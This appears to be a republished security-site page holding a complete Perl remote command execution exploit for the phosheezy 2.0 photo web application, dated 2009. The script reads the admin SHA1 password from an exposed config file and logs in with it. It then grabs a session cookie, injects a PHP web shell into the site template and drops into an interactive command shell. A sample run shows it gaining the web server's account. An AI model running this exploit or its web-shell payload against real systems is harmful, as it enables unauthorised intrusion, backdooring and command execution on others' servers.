phosheezy 2.0 Remote Command Execution Exploit
|
来源:osirys.org 作者:Osirys 发布时间:2009-01-15
|
|
#!/usr/bin/perl
# phosheezy 2.0 # http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz # Remote Command Execution Exploit # by Osirys # osirys[at]live[dot]it # osirys.org # Greets: HaVoC, x0r, jay, BlackLight # lol at athos
# -------------------------------------------------------------- # Exploit in action :D # -------------------------------------------------------------- # osirys[~]>$ perl exp.txt http://localhost/phosheezy/ # # ---------------------------- # Phosheezy RCE Exploit # Coded by Osirys # ---------------------------- # # [+] Admin password found: # Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c # [+] Grabbing server headers to get a valid SESSION ID .. # [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2 # [+] Succesfully logged in as Administrator # [+] Template edited, RCE Vulnerability Created ! # shell$> id # uid=80(apache) gid=80(apache) groups=80(apache) # shell$> exit # [-] Quitting .. # osirys[~]>$ # --------------------------------------------------------------
use HTTP::Request; use LWP::UserAgent; use IO::Socket;
my $host = $ARGV[0]; my $pwd_path = "/config/password"; my $adm_path = "/admin.php"; my $templ_path = "/admin.php?action=3";
help("-1") unless ($host); cheek($host) == 1 || help("-2"); &banner;
$datas = get_data($host); $datas =~ /(.*) (.*)/; ($h0st,$path) = ($1,$2);
my $url = $host.$pwd_path; my $re = get_req($url);
if ($re =~ /([0-9a-f]{40})/) { $password = $1; print "[+] Admin password found:\n"; print " Sha1 pwd: $password \n"; adm_log($password); } else { print "[-] Unable to get sha1 Admin password\n\n"; exit(0); }
sub adm_log() { my $password = $_[0]; my $link = $path.".".$adm_path; my $post = "password=$password&Login=Login"; my $length = length($post); my @data; my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die $!;
my $data = "POST ".$link." HTTP/1.1\r\n". "Host: ".$h0st."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".$length."\r\n\r\n". $post."\r\n";
$socket->send($data); print "[+] Grabbing server headers to get a valid SESSION ID ..\n";
while (my $e = <$socket>) { push(@data,$e); } foreach my $e(@data) { if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) { $log_ = 1; print "[+] Succesfully logged in as Administrator\n"; } elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) { $phpsessid = $1; print "[+] SESSION ID grabbed: $phpsessid\n"; } }
(($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n"; RCE_create($phpsessid); }
sub RCE_create() { my $phpsessid = $_[0]; my $link = $path.".".$templ_path; my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit". "le></head><body bgcolor=\"#ffffff\" text=\"#0000". "00\">&footer=</body></html><!-- cmd --><?php sys". "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout"; my $length = length($code);
my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die $!;
my $data = "POST ".$link." HTTP/1.1\r\n". "Host: ".$h0st."\r\n". "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".$length."\r\n\r\n". "$code\r\n";
$socket->send($data);
while (my $e = <$socket>) { if ($e =~ /Edit layout again/) { $rce_c = 1; print "[+] Template edited, RCE Vulnerability Created !\n"; } }
$rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n"; &exec_cmd; }
sub exec_cmd { print "shell\$> "; $cmd = <STDIN>; $cmd !~ /exit/ || die "[-] Quitting ..\n"; $exec_url = ($host."/index.php?cmd=".$cmd); $re = get_req($exec_url); if ($re =~ /<!-- cmd -->(.*)/) { my $cmd = $1; $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/; print "$cmd\n"; &exec_cmd; } else { print "[-] Undefined output or bad cmd !\n"; &exec_cmd; } }
sub get_req() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; }
sub cheek() { my $host = $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } }
sub get_data() { my $host = $_[0]; $host =~ /http:\/\/(.*)/; $s_host = $1; $s_host =~ /([a-z.]{1,30})\/(.*)/; ($h0st,$path) = ($1,$2); $h0st !~ /www/ || $h0st =~ s/www\.//; $path =~ s/(.*)/\/$1/; $full_det = $h0st." ".$path; return $full_det; }
sub banner { print "\n". " ---------------------------- \n". " Phosheezy RCE Exploit \n". " Coded by Osirys \n". " ---------------------------- \n\n"; }
sub help() { my $error = $_[0]; if ($error == -1) { &banner; print "\n[-] Cheek that you provide a hostname address!\n"; } elsif ($error == -2) { &banner; print "\n[-] Bad hostname address !\n"; } print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; exit(0); }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|